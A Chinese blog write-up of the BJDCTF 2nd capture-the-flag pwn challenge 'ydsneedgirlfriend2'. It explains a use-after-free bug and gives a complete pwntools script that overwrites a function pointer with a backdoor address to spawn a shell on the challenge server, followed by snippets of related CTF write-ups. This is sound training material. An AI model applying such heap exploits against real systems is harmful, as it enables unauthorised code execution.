[BJDCTF 2nd]ydsneedgirlfriend2_一看就会....

最新推荐文章于 2020-08-24 10:18:47 发布
最新推荐文章于 2020-08-24 10:18:47 发布
阅读量439 收藏
点赞数
分类专栏: # BUUCTF_pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42037374/article/details/105263621
版权

目录

文件信息

在这里插入图片描述

IDA截图

  • add
    在这里插入图片描述
  • delete
    在这里插入图片描述
  • free
    在这里插入图片描述

漏洞点

在这里插入图片描述

  • 在free函数的时候,存在着UAF漏洞,只是free掉了指针个context,但是没有置为NULL

总结点

  • 如何利用:将puts指针修改为后门函数,getshell。
  • 出错点:第一次在使用system函数的时候,将地址/bin/sh(0x400D96)开始的地址。在本地可以getshell,但是远程失败了。
    在这里插入图片描述

EXP1

# -*- coding: utf-8 -*-
from pwn import *
context.log_level = 'debug'
local = 1
if local:
    p = process("./ydsneedgirlfriend2")
else:
    p= remote('node3.buuoj.cn',26040)

def add(size,context):
    p.recvuntil("u choice :\n")
    p.sendline(str(1))
    p.recvuntil("Please input the length of her name:\n")
    p.sendline(str(size))
    p.recvuntil("Please tell me her name:\n")
    p.sendline(context)

def delete(index):
    p.recvuntil("u choice :\n")
    p.sendline(str(2))
    p.recvuntil("Index :")
    p.sendline(str(index))


def show(index):
    p.recvuntil("u choice :\n")
    p.sendline(str(3))
    p.recvuntil("Index :")
    p.sendline(str(index))

#----
system_sh_addr = 0x400D86
#----

def pwn():
    add(0x30,"aaaa")  #0 #这里创建多大的chunk都可以,最好是大于0x20,减少后面申请chunk。
    delete(0)
    add(0x10,p64(system_sh_addr)*2)
    #pause()
    show(0)

    p.interactive()
    
if __name__ == "__main__":
    pwn()
Jc^
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BJDCTF 2nd]ydsneedgirlfriend2[use after free]
、moddemod
06-26 400
有符号表,而且直接留了后门! exp from pwn import * context(log_level='d.
CTF-Pwn-[BJDCTF 2nd]ydsneedgirlfriend2
归子莫的博客
05-06 953
CTF-Pwn-[BJDCTF 2nd]ydsneedgirlfriend2 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Pwn类,[BJDCTF 2nd]ydsneedgirlfriend2 下载...
buuctf [BJDCTF 2nd]ydsneedgirlfriend2
weixin_45677731的博客
08-13 194
[BJDCTF 2nd]ydsneedgirlfriend2 一道有手就行的堆题 这道题目的实现过程非常简单易懂,最后的脚本也非常简洁,适合我这样的萌新。 64位程序,拖进ida,看几个主要函数 add函数: 注意,如果bss段的0x6020a0这里没有内容的话,程序先申请一个0x10的chunk,用于存放接下来为用户申请的chunk的地址和print girlfriend name函数的地址,可以看到这个函数用处就是输出内容,同时,这个chunk本身的地址被放在0x6020a0处 接下来,用户输
buuoj BJDCTF 2nd ydsneedgirlfriend2
pondzhang的专栏
03-30 329
free代码,free以后未置空指针 unsigned __int64 dele() { …… free(*(void **)girlfriends[v1]); free((void *)girlfriends[v1]); …… } 可以再次利用 from pwn import * #sh = process('./ydsneedgirlfriend2') def ad...
jarvis oj level1
发蝴蝶和大脑斧的博客
12-01 335
还是先checksec Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments 发现数据部分可以执行,先看ida,同样是vulnerable处有栈溢...
1641362400000_com.eg.android.AlipayGphone-main.2nd
01-08
1641362400000_com.eg.android.AlipayGphone-main.2nd
1637679600000_com.eg.android.AlipayGphone-main.2nd
12-07
1637679600000_com.eg.android.AlipayGphone-main.2nd
KTP触摸屏恢复出厂Basic2nd_Recovery_System.rar
06-08
通过该软件,可将第二代精简面板复位为出厂设置。 该软件现已发布,适用于以下设备: KTP400 Basic KTP700 Basic / KTP700 Basic DP KTP900 Basic KTP1200 Basic / KTP1200 Basic DP 如何将第二代精简面板复位为出厂...
KTP触摸屏恢复出厂设置方法和Basic2nd_Recovery_System.rar
05-13
2. **解压文件**:将"Basic2nd_Recovery_System.rar"文件解压到计算机的某个目录下,确保解压后的文件完整无损。 3. **运行软件**:打开解压后的"Basic2nd_Recovery_System"程序,按照界面上的指示操作。这可能包括...
1637668800000_com.eg.android.AlipayGphone-main.2nd
12-07
1637668800000_com.eg.android.AlipayGphone-main.2nd
buuctf [BJDCTF 2nd]ydsneedgirlfriend2 UAF
carol2358的博客
05-07 600
UAF题 先申请一个看看结构 把print的位置改为backdoor的地址 先dele 申请0x10, 然后就可以覆盖print的地址了,然后show就可以跳转到backdoor exp: from pwn import * from LibcSearcher import * local_file = './ydsneedgirlfriend2' local_libc = '/li...
BJDCTF 2ndydsneedgirlfriend2(write up)
qq_44768749的博客
08-24 214
BJDCTF 2ndydsneedgirlfriend20x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 开启了栈不可执行和canary以及部分RELRO保护 0x02 运行 运行时并没有发现太大问题,就是根据选项执行相应功能。 0x03 IDA add delete函数 show函数 漏洞点 在free函数的时候,存在着UAF漏洞,只是free掉了指针个context,但是没有置空 0x04 思路 将puts指针修改为后门
【BJD 2nd WriteUp】一个几乎没啥干货的WP
古月浪子的博客
03-22 829
这周末打了一下第二届BJD CTF,被新生赛按在地上锤 /(ㄒoㄒ)/~~ 写个WP记录一下做题过程 目录Crypto签到老文盲了cat_flagY1nglishrsa0Misc最简单的miscA_Beautiful_PictureEasyBaBaReal_EasyBaBa问卷调查TARGZReverseguessgame8086Pwnr2t3one_gadgetydsneedgirlfrie...
BJDCTF 2nd pwn Writeup
starssgo的博客
03-23 3117
博客地址 没做完…没出的题复现了补上去… r2t3 整数溢出,还是比较简单的 # -*- coding: utf-8 -* from pwn import * from LibcSearcher import * context.log_level = 'debug' context.arch = 'amd64' elf = ELF('r2t3') p = 0 def pwn(ip,port,de...
re学习笔记(53)BUUCTF-re-[BJDCTF 2nd]guessgame | 8086
逆向随笔
03-23 2654
新手一枚,如有错误(不足)请指正,谢谢!! 个人博客:点击进入/点击进入 [BJDCTF 2nd]guessgame 题目链接:点击进入 IDA载入,shift+F12搜索字符串,即可得到flag 得到flag为BJD{S1mple_ReV3r5e_W1th_0D_0r_IDA} (刚开始没查找字符串,傻乎乎的看了主代码没找到flag,然后又去看了在main函数前执行的pre_c_init和p...
pwn-200(XDCTF-2015)--write up
ATFWUS的博客
03-03 2762
文件下载地址: 链接:https://pan.baidu.com/s/1W-bn57DPwr0GZlOsAl2enQ 提取码:z3sy 0x01.分析 checksec: 32位程序,只开启NX。 查看源码: 分析源码: 从源码可以得出,主要在read出有栈溢出漏洞。 程序并没有留后门,得靠自己想办法去执行,system('/bin/sh')。 漏洞利用思路: 首...
BJDCTF_2nd PWN复盘
weixin_44145820的博客
03-26 539
目录r2t3one_gadgetydsneedgirlfriend2r2t4 r2t3 在name_check函数中有一个strcpy,看起来是溢出的机,但是前面判断了长度,这里在汇编下才能发现漏洞 即只要长度超过255就溢出 Exp: from pwn import * r = remote("node3.buuoj.cn", 29302) elf = ELF("./BJDCTF_2...
今天你pwn了吗(三)
蚁景网安学院
06-04 742
前言我们接着前两篇的内容继续往下学习。所有题目都可在BUU平台搜索得到 Ctal+F 然后输入题目名字即可。同样的,在开始之前我们先来看下几个 函数吧,一定要 好好学下遇到的函数呢,很重...
BUUCTF_2.RIP覆盖一下
Jc
07-05 3759
解题思路 1. 查看文件信息,安全机制 2. 代码审计 3. 分析漏洞点 4. 编写EXP 1.基本信息 $checksec ./文件名 2.代码审计 不管在简单题都一定要IDA查看一下伪代码(IDA做好是7.0以上的版本) 首先查看敏感字符串(Ctrl+1) 1.gets从标准输入设备读字符串函数,其可以无限读取,不判断上限,以回车结束读取,所以应该确保buffer的空间足够大,以便在执...
aurix_2ndgeneration_startup_and_initialisation.pdf
最新发布
05-12
"AURIX 2nd Generation Startup and Initialisation.pdf"是一份关于AURIX 2微处理器的启动和初始化方面的文档。AURIX 2是一种非常强大的微处理器,广泛用于汽车和工业应用中。这份文档主要包括以下内容: 首先介绍...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值